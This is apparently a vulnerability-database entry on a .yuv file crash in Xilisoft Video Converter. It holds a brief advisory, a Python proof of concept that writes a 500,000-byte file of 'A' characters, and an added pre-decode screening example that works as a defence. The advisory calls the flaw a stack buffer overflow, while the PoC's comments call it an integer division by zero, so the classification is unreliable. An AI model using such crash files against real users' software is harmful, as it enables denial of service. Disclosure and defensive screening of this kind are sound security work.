
Xilisoft Video Converter Wizard – ‘.yuv’ Stack Buffer Overflow
source: http://www.securityfocus.com/bid/38854/info

Xilisoft Video Converter is prone to a stack-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied input.

Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.

```python
#!/usr/bin/python
#
# Xilisoft Video Converter(.yuv file) Stack buffer Overflow Poc
# Homepage: www.xilisoft.com
# #############################################################################
# Credit : ItSecTeam
# mail : Bug@ItSecTeam.com
# Web: WwW.ITSecTeam.com
# Forum: WwW.forum.itsecteam.com
# Exploit Coded by: hoshang jafari a.k.a (PLATEN) @ ItSecTeam
# Special Thanks : M3hr@n.S - B3hz4d - Cdef3nder
# #############################################################################
# Bug: Integer Division By Zero
# Tested in : Windows XP SP3 EN
# Tested version : 3 = Crash
# Usage: ./Xilisoft-poc.py
# #############################################################################
# 102DFDAB: Integer divide by zero (exc.code c0000094, tid 2908)
# EAX 00000000 ECX 00000000 EBX 00000001 ESP 000E629C EBP 025B3270
# ESI 00000000 EDI 00000000 EIP 102DFDAB avcodec.102DFDAB

try:
    # Write 500000 'A' (0x41) bytes to the test .yuv file
    poc_file = open("Xilisoft-poc.yuv", 'w')
    Buff = "\x41" * 500000
    poc_file.write(Buff)
    poc_file.close()
    print("[+] File created successfully: Xilisoft-poc.yuv")
except IOError:
    print("[-] Error cant write file to system\n")
```
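An added example, not part of the original advisory or PoC: a pre-decode screen for headerless raw .yuv input that rejects unusable dimensions before any division and flags files shaped like the one the PoC writes (500000 repeated 0x41 bytes). The I420 (YUV 4:2:0 planar) layout, the 176x144 dimensions, the size limit and all function names are assumptions made for illustration.

```python
"""Pre-screen raw .yuv input before it reaches a decoder (added example)."""


def frame_size_i420(width, height):
    """Bytes per I420 frame; raises ValueError on unusable dimensions."""
    if width <= 0 or height <= 0 or width % 2 or height % 2:
        raise ValueError("width and height must be positive even integers")
    return width * height * 3 // 2


def screen_yuv(data, width, height, max_bytes=1 << 30):
    """Return a list of findings; an empty list means the input looks sane."""
    try:
        fsize = frame_size_i420(width, height)
    except ValueError as exc:
        # Stop here: nothing below may divide by an unchecked frame size.
        return ["bad dimensions: %s" % exc]
    findings = []
    if not data:
        findings.append("empty file")
    elif len(data) > max_bytes:
        findings.append("file larger than configured limit")
    if len(data) % fsize:
        findings.append("size %d is not a whole number of %d-byte frames"
                        % (len(data), fsize))
    # A long run of one byte value is filler, not picture data.
    if len(data) >= 1024 and len(set(data)) == 1:
        findings.append("payload is a single repeated byte 0x%02x" % data[0])
    return findings


# Constructed samples (not captured files).
POC_LIKE = b"\x41" * 500000       # same content the PoC above writes
VALID = bytes(range(256)) * 297   # 76032 bytes = two 176x144 I420 frames

if __name__ == "__main__":
    for name, blob in (("poc-like", POC_LIKE), ("valid", VALID)):
        print(name, screen_yuv(blob, 176, 144) or "ok")
```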
Project information
- Category: Security vulnerabilities
- Date: 11/10/1397
- Tags: Security vulnerabilities